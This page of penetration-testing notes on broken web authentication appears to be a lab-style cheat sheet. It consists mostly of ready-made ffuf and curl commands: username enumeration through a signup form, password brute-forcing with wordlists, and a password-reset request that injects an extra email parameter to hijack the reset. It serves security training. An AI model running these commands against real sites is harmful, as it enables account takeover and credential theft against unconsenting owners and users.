Broken Authentication
The authentication mechanisms that manage a system's sessions, if poorly designed and/or implemented, can be defeated by attackers. Let's see how threat actors do that.
Fuzzing for usernames
ffuf -w /opt/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://target_ip/signup_page -mr "username already exists"Bruteforcing authentication forms
ffuf -w valid_usernames.txt:W1,/opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://target_ip/login_page -fc 200Subverting application logic
curl 'http://target_ip/customers/reset?email=user%40target.com' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=user'curl 'http://target_ip/customers/reset?email=user%40target.com' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&[email protected]'Last updated